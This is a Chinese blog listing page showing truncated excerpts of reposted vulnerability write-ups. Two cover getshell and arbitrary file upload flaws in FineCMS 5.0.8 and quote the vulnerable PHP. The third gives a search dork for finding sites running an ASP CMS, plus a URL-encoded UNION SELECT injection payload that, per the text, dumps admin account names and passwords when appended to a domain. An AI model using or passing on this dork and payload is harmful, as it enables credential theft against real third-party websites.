漏洞
关注
分享
扫一扫
AdministratorHack
This is a begin!
展开
-
finecmsV5.0.8 \finecms\dayrui\controllers\Api.php getshell
漏洞在C:\phpStudy\WWW\finecms\dayrui\controllers\Api.php中的data2函数,大约在第115行,有问题的代码大约在178行public function data2() { $data = array(); // 来路认证 if (defined('SYS_REFERER') && strlen转载 2017-08-17 15:45:25 · 1262 阅读 · 0 评论 -
finecms 5.0.8低版本前台任意文件上传-
前台头像上传的地方任意文件上传publicfunction upload() { // 创建图片存储文件夹 $dir= SYS_UPLOAD_PATH.'/member/'.$this->uid.'/'; @dr_dir_delete($dir); !is_dir($dir转载 2017-08-17 15:53:35 · 1416 阅读 · 0 评论 -
某款asp的cms程序注射漏洞
简要描述:谷歌百度搜索关键词 inurl:HomeMarket.asp 在域名后面加上以下代码能爆破出管理帐号密码/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%2转载 2017-08-04 15:43:41 · 1678 阅读 · 0 评论